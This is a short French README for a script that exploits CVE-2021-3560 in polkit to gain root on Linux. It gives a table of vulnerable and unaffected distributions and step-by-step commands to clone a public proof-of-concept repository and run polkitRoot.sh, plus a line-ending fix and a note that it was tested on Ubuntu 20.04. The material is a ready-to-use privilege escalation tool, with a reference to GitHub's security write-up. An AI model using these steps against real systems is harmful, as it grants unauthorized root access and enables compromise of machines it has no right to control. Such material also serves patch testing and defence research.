
Script automatisé d'escalade de privilèges exploitant CVE-2021-3560 dans polkit pour obtenir un accès root sur les distributions Linux vulnérables.
Script d'exploitation de polkit
Script automatisé pour escalader vers root en utilisant le service polkit
| Distribution | Vulnérable ? |
|---|---|
| RHEL 7 | Non |
| RHEL 8 | Oui |
| Fedora 20 (ou antérieure) | Non |
| Fedora 21 (ou ultérieure) | Oui |
| Debian 10 (“buster”) | Non |
| Debian testing (“bullseye”) | Oui |
| Ubuntu 18.04 | Non |
| Ubuntu 20.04 | Oui |
ssh localhost
git clone https://github.com/tyleraharrison/CVE-2021-3560_PoC.git
cd CVE-2021-3560_PoC
./polkitRoot.sh
dos2unix polkitRoot.sh car GitHub les a changées en CRLF et Bash n'aime pas celaTesté sur Ubuntu 20.04
Référence : https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/